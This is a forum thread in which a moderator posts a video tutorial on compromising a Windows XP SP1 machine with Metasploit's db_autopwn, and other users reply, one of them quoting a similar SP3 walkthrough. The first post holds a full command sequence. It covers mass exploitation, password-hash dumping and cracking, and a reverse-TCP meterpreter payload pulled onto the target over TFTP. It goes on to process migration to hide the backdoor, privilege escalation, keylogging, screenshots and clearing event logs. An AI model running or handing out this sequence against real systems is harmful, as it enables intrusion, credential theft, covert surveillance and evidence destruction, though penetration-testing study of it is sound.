Results 1 to 6 of 6

Thread: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/4644349/
    Download video: http://www.mediafire.com/?cyxtis1ymly84f5


    What is this?
    This guide shows how to setup PostgreSQL as the database to power metasploit, which then leads onto using metasploit's db_autopwn features to carry out a collection of remote exploits in an attempt to gain access to the target system(s). When/If access has been gained; it shows a few basic things afterwards, such as:

    • Gathering information – OS, interfaces, privilege level, running processes, idle time, screen shoots and keylogging
    • Cracking user's passwords – Finding passwords to access the system
    • Gaining shell access – Then transferring meterpreter agent via TFTP
    • Handling multiple sessions – Which vulnerability to interact with.
    • Process migration – Move code into another process
    • Privilege escalation - Attempt to gain SYSTEM level privileges.
    • File management – Navigation, Down/Up-load, editing, viewing files/folders
    • Program control – Execution and Killing programs
    • Misc – Covering tracks and Power management




    Guide

    • Configure PostgreSQL database to be able to function with metasploit
    • Setup metasploit to use PostgreSQL and how to connect automatically at startup
    • Use nmap from metasploit to scan for target(s)
    • Running db_autopwn to attempt to run a collection of remote exploit(s) on discovered target(s) (The two exploits which work were: windows/smb/ms04_011_lsass and windows/dcerpc/ms03_026_dcom)
    • Dump the hash table, then by using John The Ripper break password(s)
    • Using an alternative method rather than meterpreter to transfer files, TFTP (Useful if you only have shell accesses and wish to use meterpreter shell instead OR interact with another system)
    • Migrating to a different process which hides backdoor from running process lists (makes it less obvious of injection and allows the backdoor to be deleted if needed. Plus if the services that were exploited didn't have interactive access to the desktop, it now would)
    • Escalate Privilege which allows the attacker to gain more control over the system.
    • Various commands to navigate through the file system as well as altering the file structure.
    • Basic commands to collect information about the system & user.




    What do I need?

    • PostgreSQL – (Can be found on BackTrack 4-R2)
    • Metasploit – (Can be found on BackTrack 4-R2)
    • Nmap – (Can be found on BackTrack 4-R2)
    • TFTPD – (Can be found on BackTrack 4-R2)
    • Text Editor – (Kate can be found on BackTrack 4-R2)




    Commands:
    Code:
    /etc/init.d/postgresql-8.3 start
    /etc/init.d/postgresql-8.3 status
    passwd -d postgres
    su postgres
    psql
    ALTER USER postgres WITH PASSWORD 'g0tmi1k';
    \q
    passwd
    psql -l
    createdb msf
    psql -l
    exit
    clear
    
    msfconsole
    db_driver
    db_driver postgresql
    db_connect postgres:g0tmi1k@127.0.0.1/msf
    exit
    
    kate ~/.msf3/msfconsole.rc
    db_driver postgresql
    db_connect postgres:g0tmi1k@127.0.0.1/msf
    db_workspace -a msf
    clear
    
    msfconsole
    db_hosts
    db_nmap -O -sS -sV -v 192.168.0.100-110   #192.168.0.0/24 -A
    db_hosts
    db_autopwn -t -p -e -b #db_autopwn -t -x -e -r -T 30
    clear
    
    sessions -l -v
    sessions -i 1
    sysinfo
    ipconfig
    getuid
    hashdump
    
    kate -> paste -> Save: ~/hashdump
    cd /pentest/passwords/jtr/
    ./john ~/hashdump
    clear
    
    start-tftpd
    cd /tmp
    ifconfig
    msfpayload windows/meterpreter/reverse_tcp lhost=192.168.0.33 X > g0tmi1k.exe
    ls
    
    background
    clear
    
    search handler
    use multi/handler
    show options
    exploit -j
    sessions -i 1
    shell
    cd C:\
    tftp *-i 192.168.0.105 GET g0tmi1k.exe
    g0tmi1k.exe
    exit
    
    sessions -l -v
    sessions -i 3
    getuid
    ps
    migrate [Explorer.EXE]
    getuid
    getsystem #getprivs if not enabled, migrate if that fails - and try again
    getuid
    pwd
    cd C:/
    ls
    mkdir g0tmi1k
    ls
    cd g0tmi1k
    ls
    pwd
    getwd
    lpwd
    
    echo have you... > /tmp/message.txt
    
    upload /tmp/message.txt C:/g0tmi1k/
    ls
    edit message.txt
    A -> g0tmi1k? -> esc -> :wq
    cat C:/g0tmi1k/message.txt
    download message.txt /tmp/
    execute -*f notepad -a message.txt
    del message.txt
    ls
    cd \
    ls
    rmdir g0tmi1k
    ls
    ps
    kill [notepad]
    idletime
    screenshot
    run keylogrecorder
    
    mail.google.com thisismyusername thisismypassword
    
    clearev
    shutdown
    exit
    
    kate -> open -> /path/to/key/logger/file/which/
    Notes:

    • I had deleted postgres's password before recording the video. This is the reason why it didn't prompt me for "(Current) UNIX password:". The solution would be to type "passwd -d postgres" before "su postgres". The commands have been updated to reflex this.
    • Metasploit can do A LOT more – this is a brief insight to it
    • db_autopwn may not work on your chosen target - Target in the video is running Windows XP SP1
    • db_autopwn is “noisy” as it tries a mass of exploits.
    • Windows XP by default has a TFTP client built into it, Windows 7 doesn't.



    Song: Luke Solomon – Liquid & Bungalove - Saturday Song
    Video length: 10:28
    Capture length: 25:01
    Last edited by g0tmi1k; 03-05-2011 at 01:10 PM.
    Have you...g0tmi1k?

  2. #2
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    18

    Default Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)

    Great Video man,nice work too keep it on .

  3. #3
    Member m0j4h3d's Avatar
    Join Date
    Jan 2010
    Posts
    84

    Default Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)

    nice work man .. xp system is still being used nowadays .. but i prefer facing WIN7 ...
    btw nice work boy
    go fw
    ---> 3v3RY D4y P4ss3S 1 f0uNd N3W th1NGs <---
    Knowing how 2 use BT dsnt mean that u r hacker

  4. #4
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    1

    Default Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)

    Thanks for the tutorial.

  5. #5
    Member
    Join Date
    May 2010
    Location
    Frankfurt/Main
    Posts
    58

    Default Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)

    I found by chance a similar video, but with SP3, dunnow if its interesting...

    http://www.youtube.com/watch?v=dKLWvGWA-Ow

    From the Description Box:

    How to own a Windows XP SP3 Box with Metasploit / Backtrack.

    Tutorial: Metasploit DB Autopwning

    Commands:

    /etc/init.d/postgresql-8.3 start # start the database
    msfconsole # start metasploit




    db_connect pentest # connect to database
    db_nmap HOST IP/ HOSTNAME # Scan for open Ports
    db_autopwnage -e -p # -e = All matched Targets, # -p = Select Attacks based on open Ports

    Wait until a Meterpreter Session, like:

    *] Meterpreter session 1 opened (10.0.0.128:44919 - 10.0.0.130:33411)

    Wait until the Attack is over or STRG+C to Terminate the Attack.

    Now:

    Sessions # shows your connects to the victim
    Session -i 1 # you join session 1
    shell # opens reverse shell on victim

    Use the help function, to get information about other available commands.

    FOR EDUCATIONAL PURPOSES ONLY
    Last edited by MartinBishop; 03-01-2011 at 11:34 AM. Reason: add the text

  6. #6
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)

    Quote Originally Posted by m4jh0l View Post
    Great Video man,nice work too keep it on .
    Quote Originally Posted by pusherman View Post
    Thanks for the tutorial.
    Thanks for the feedback



    Quote Originally Posted by m0j4h3d View Post
    nice work man .. xp system is still being used nowadays .. but i prefer facing WIN7 ...
    btw nice work boy
    go fw
    Yes they are, however, XP SP1 are "rare".
    I do plan to get to Windows 7 - just want to do a few OSs/SPs between then tho



    Quote Originally Posted by MartinBishop View Post
    I found by chance a similar video, but with SP3, dunnow if its interesting...

    http://www.youtube.com/watch?v=dKLWvGWA-Ow

    From the Description Box:
    Thanks for sharing. Ive had a quick look at the video and on the targets machine, they have got VNC installed...
    In my demos it is a fresh install of the OS and SP, without any other software install, using the default values. Im not what sure what exploit was used to create the session(s).

    I am soon recording my take on XP SP3.
    Have you...g0tmi1k?

Similar Threads

  1. Metasploit db_autopwn using PostgreSQL
    By sickness in forum BackTrack Howtos
    Replies: 53
    Last Post: 03-28-2011, 03:22 AM
  2. Metasploit e db_autopwn
    By pellegrino_tarantino in forum Angolo dei Newbie
    Replies: 2
    Last Post: 03-10-2011, 04:32 PM
  3. Replies: 21
    Last Post: 03-02-2011, 07:06 PM
  4. Owning a Windows XP with a shared folder.
    By sickness in forum BackTrack Videos
    Replies: 6
    Last Post: 02-12-2011, 02:56 AM
  5. Metasploit and db_autopwn usage
    By pellegrino_tarantino in forum Beginners Forum
    Replies: 0
    Last Post: 01-15-2011, 01:00 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •